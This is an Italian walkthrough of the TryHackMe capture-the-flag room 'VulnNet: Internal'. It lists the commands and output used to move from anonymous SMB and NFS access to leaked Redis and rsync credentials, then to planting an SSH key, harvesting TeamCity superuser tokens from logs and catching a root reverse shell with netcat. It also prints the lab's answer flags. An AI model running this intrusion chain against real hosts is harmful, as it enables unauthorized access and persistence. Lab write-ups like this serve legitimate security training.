- Autore room: TheCyb3rW0lf
- Sistema operativo: Linux (obbligatorio)
- Difficoltà: Easy/Medium
LINK:https://tryhackme.com/room/vulnnetinternal
Descrizione:
VulnNet Entertainment è un'azienda che impara dai propri errori. Si sono subito resi conto che non potevano creare un'applicazione Web adeguatamente protetta, quindi hanno rinunciato a quell'idea. Invece, hanno deciso di istituire servizi interni per scopi commerciali. Come al solito, hai il compito di eseguire un penetration test della loro rete e segnalare i tuoi risultati.
Questa macchina è stata progettata per essere esattamente l'opposto delle macchine precedenti di questa serie e si concentra sui servizi interni. Dovrebbe mostrarti come recuperare informazioni interessanti e usarle per ottenere l'accesso al sistema. Segnala i tuoi risultati inviando i flag corretti.
INIZIAMO CON IL SCOPRIRE LA SERVICES FLAG:
Partiamo subito con una scansione su Nmap per le porte aperte:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_ 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35973/tcp mountd
| 100005 1,2,3 50743/udp mountd
| 100005 1,2,3 50821/tcp6 mountd
| 100005 1,2,3 60228/udp6 mountd
| 100021 1,3,4 33804/udp6 nlockmgr
| 100021 1,3,4 35968/udp nlockmgr
| 100021 1,3,4 38965/tcp6 nlockmgr
| 100021 1,3,4 44305/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync (protocol version 31)
2049/tcp open nfs_acl 3 (RPC #100227)
6379/tcp open redis Redis key-value store
9090/tcp filtered zeus-admin
35973/tcp open mountd 1-3 (RPC #100005)
39613/tcp open mountd 1-3 (RPC #100005)
42041/tcp open java-rmi Java RMI
44305/tcp open nlockmgr 1-4 (RPC #100021)
49833/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Elenchiamo Samba:
┌──(user㉿parrot)-[/data/VulnNet_Internal]
└─$ smbclient -L 10.10.190.83
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Ora fortunatamente possiamo accedere senza credenziali e leggere il contenuto del file services.txt che contiene la flag che ci serve:
┌──(user㉿parrot)-[/data/VulnNet_Internal]
└─$ smbclient //10.10.190.83/shares
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Feb 2 10:20:09 2021
.. D 0 Tue Feb 2 10:28:11 2021
temp D 0 Sat Feb 6 12:45:10 2021
data D 0 Tue Feb 2 10:27:33 2021
11309648 blocks of size 1024. 3275768 blocks available
smb: \> cd temp
smb: \temp\> ls
. D 0 Sat Feb 6 12:45:10 2021
.. D 0 Tue Feb 2 10:20:09 2021
services.txt N 38 Sat Feb 6 12:45:09 2021
11309648 blocks of size 1024. 3275768 blocks available
smb: \temp\> get services.txt -
THM{0a09d51e488f5fa105d8d866a497440a}
getting file \temp\services.txt of size 38 as - (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Abbiamo quindi trovato la FLAG: THM{0a09d51e488f5fa105d8d866a497440a}
PROCEDIAMO CON LA INTERNAL FLAG:
La scansione di Nmap ha rivelato una condivisione NFS:
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ mkdir tmp/
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ sudo mount -t nfs 10.10.190.83: tmp
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ tree tmp
tmp
└── opt
└── conf
├── hp
│ └── hplip.conf
├── init
│ ├── anacron.conf
│ ├── lightdm.conf
│ └── whoopsie.conf
├── opt
├── profile.d
│ ├── bash_completion.sh
│ ├── cedilla-portuguese.sh
│ ├── input-method-config.sh
│ └── vte-2.91.sh
├── redis
│ └── redis.conf
├── vim
│ ├── vimrc
│ └── vimrc.tiny
└── wildmidi
└── wildmidi.cfg
Attenzione che il file redis.conf contiene la password per il server Redis:
┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
└─$ grep -Ev "^#|^$" redis.conf
rename-command FLUSHDB ""
rename-command FLUSHALL ""
bind 127.0.0.1 ::1
protected-mode yes
port 6379
tcp-backlog 511
timeout 0
tcp-keepalive 300
daemonize yes
supervised no
pidfile /var/run/redis/redis-server.pid
loglevel notice
logfile /var/log/redis/redis-server.log
databases 16
always-show-logo yes
save 900 1
save 300 10
save 60 10000
stop-writes-on-bgsave-error yes
rdbcompression yes
rdbchecksum yes
dbfilename dump.rdb
dir /var/lib/redis
slave-serve-stale-data yes
requirepass "B65Hx562F@ggAZ@F" <-------------------- password
slave-read-only yes
repl-diskless-sync no
repl-diskless-sync-delay 5
repl-disable-tcp-nodelay no
slave-priority 100
lazyfree-lazy-eviction no
lazyfree-lazy-expire no
lazyfree-lazy-server-del no
slave-lazy-flush no
appendonly no
appendfilename "appendonly.aof"
appendfsync everysec
no-appendfsync-on-rewrite no
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
aof-load-truncated yes
aof-use-rdb-preamble no
lua-time-limit 5000
slowlog-log-slower-than 10000
slowlog-max-len 128
latency-monitor-threshold 0
notify-keyspace-events ""
hash-max-ziplist-entries 512
hash-max-ziplist-value 64
list-max-ziplist-size -2
list-compress-depth 0
set-max-intset-entries 512
zset-max-ziplist-entries 128
zset-max-ziplist-value 64
hll-sparse-max-bytes 3000
activerehashing yes
client-output-buffer-limit normal 0 0 0
client-output-buffer-limit slave 256mb 64mb 60
client-output-buffer-limit pubsub 32mb 8mb 60
hz 10
aof-rewrite-incremental-fsync yes
Analizziamo il file per la flag:
┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> ping
PONG
10.10.190.83:6379> KEYS *
1) "tmp"
2) "marketlist"
3) "authlist"
4) "internal flag"
5) "int"
10.10.190.83:6379>
10.10.190.83:6379> KEYS "internal flag"
1) "internal flag"
10.10.190.83:6379> GET "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"
La flag è: THM{ff8e518addbbddb74531a724236a8221}
USER FLAG:
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "int"
5) "tmp"
10.10.190.83:6379> GET authlist
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.190.83:6379> LRANGE authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
10.10.190.83:6379>
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83 23 ⨯
files Necessary home interaction
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83 23 ⨯
files Necessary home interaction
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ cp ~/.ssh/id_rsa.pub authorized_keys
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync authorized_keys rsync://rsync-connect@10.10.190.83/files/sys-internal/.ssh 3 ⨯
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ ssh sys-internal@10.10.190.83
sys-internal@vulnnet-internal:~$ cat user.txt
THM{da7c20696831f253e0afaca8b83c07ab}
USER FLAG: THM{da7c20696831f253e0afaca8b83c07ab}
⠀
⠀
⠀
ROOT FLAG:
sys-internal@vulnnet-internal:/$ ls -la /
total 533824
drwxr-xr-x 24 root root 4096 Feb 6 12:58 ./
drwxr-xr-x 24 root root 4096 Feb 6 12:58 ../
drwxr-xr-x 2 root root 4096 Feb 2 14:05 bin/
drwxr-xr-x 3 root root 4096 Feb 1 14:02 boot/
drwx------ 2 root root 4096 Feb 1 13:41 .cache/
drwxr-xr-x 17 root root 3720 May 27 07:34 dev/
drwxr-xr-x 129 root root 12288 Feb 7 19:21 etc/
drwxr-xr-x 3 root root 4096 Feb 1 13:51 home/
lrwxrwxrwx 1 root root 34 Feb 1 14:01 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx 1 root root 33 Feb 1 13:30 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x 18 root root 4096 Feb 1 13:43 lib/
drwxr-xr-x 2 root root 4096 Feb 1 13:28 lib64/
drwx------ 2 root root 16384 Feb 1 13:27 lost+found/
drwxr-xr-x 4 root root 4096 Feb 2 10:49 media/
drwxr-xr-x 2 root root 4096 Feb 1 13:27 mnt/
drwxr-xr-x 4 root root 4096 Feb 2 10:28 opt/
dr-xr-xr-x 136 root root 0 May 27 07:33 proc/
drwx------ 8 root root 4096 Feb 6 13:32 root/
drwxr-xr-x 27 root root 880 May 27 08:37 run/
drwxr-xr-x 2 root root 4096 Feb 2 14:06 sbin/
drwxr-xr-x 2 root root 4096 Feb 1 13:27 srv/
-rw------- 1 root root 546529280 Feb 1 13:27 swapfile
dr-xr-xr-x 13 root root 0 May 27 08:39 sys/
drwxr-xr-x 12 root root 4096 Feb 6 13:30 TeamCity/ <----------------------- interesting
drwxrwxrwt 11 root root 4096 May 27 08:40 tmp/
drwxr-xr-x 10 root root 4096 Feb 1 13:27 usr/
drwxr-xr-x 13 root root 4096 Feb 1 13:43 var/
lrwxrwxrwx 1 root root 31 Feb 1 14:01 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx 1 root root 30 Feb 1 13:30 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic
sys-internal@vulnnet-internal:~$ ss -ltp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 0.0.0.0:microsoft-ds 0.0.0.0:*
LISTEN 0 128 0.0.0.0:39391 0.0.0.0:*
LISTEN 0 64 0.0.0.0:nfs 0.0.0.0:*
LISTEN 0 128 0.0.0.0:33735 0.0.0.0:*
LISTEN 0 5 0.0.0.0:rsync 0.0.0.0:*
LISTEN 0 50 0.0.0.0:netbios-ssn 0.0.0.0:*
LISTEN 0 128 0.0.0.0:6379 0.0.0.0:*
LISTEN 0 128 0.0.0.0:sunrpc 0.0.0.0:*
LISTEN 0 64 0.0.0.0:34769 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:domain 0.0.0.0:*
LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
LISTEN 0 5 127.0.0.1:ipp 0.0.0.0:*
LISTEN 0 128 0.0.0.0:33145 0.0.0.0:*
LISTEN 0 50 [::ffff:127.0.0.1]:57882 *:*
LISTEN 0 50 [::]:microsoft-ds [::]:*
LISTEN 0 64 [::]:nfs [::]:*
LISTEN 0 50 *:9090 *:*
LISTEN 0 1 [::ffff:127.0.0.1]:8105 *:*
LISTEN 0 5 [::]:rsync [::]:*
LISTEN 0 128 [::1]:6379 [::]:*
LISTEN 0 50 [::]:netbios-ssn [::]:*
LISTEN 0 100 [::ffff:127.0.0.1]:8111 *:* <------------ TeamCity running on localhost on port 8111
LISTEN 0 128 [::]:sunrpc [::]:*
LISTEN 0 64 [::]:33363 [::]:*
LISTEN 0 128 [::]:40659 [::]:*
LISTEN 0 128 [::]:ssh [::]:*
LISTEN 0 50 *:35095 *:*
LISTEN 0 128 [::]:38359 [::]:*
LISTEN 0 5 [::1]:ipp [::]:*
LISTEN 0 128 [::]:46425 [::]:*
$ ssh -L 8111:127.0.0.1:8111 sys-internal@10.10.190.83
sys-internal@vulnnet-internal:/TeamCity$ grep -iR token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.190.83] 48482
bash: cannot set terminal process group (481): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# cat /root/root.txt
<uildAgent/work/2b35ac7e0452d98f# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
ROOT FLAG: THM{e8996faea46df09dba5676dd271c60bd}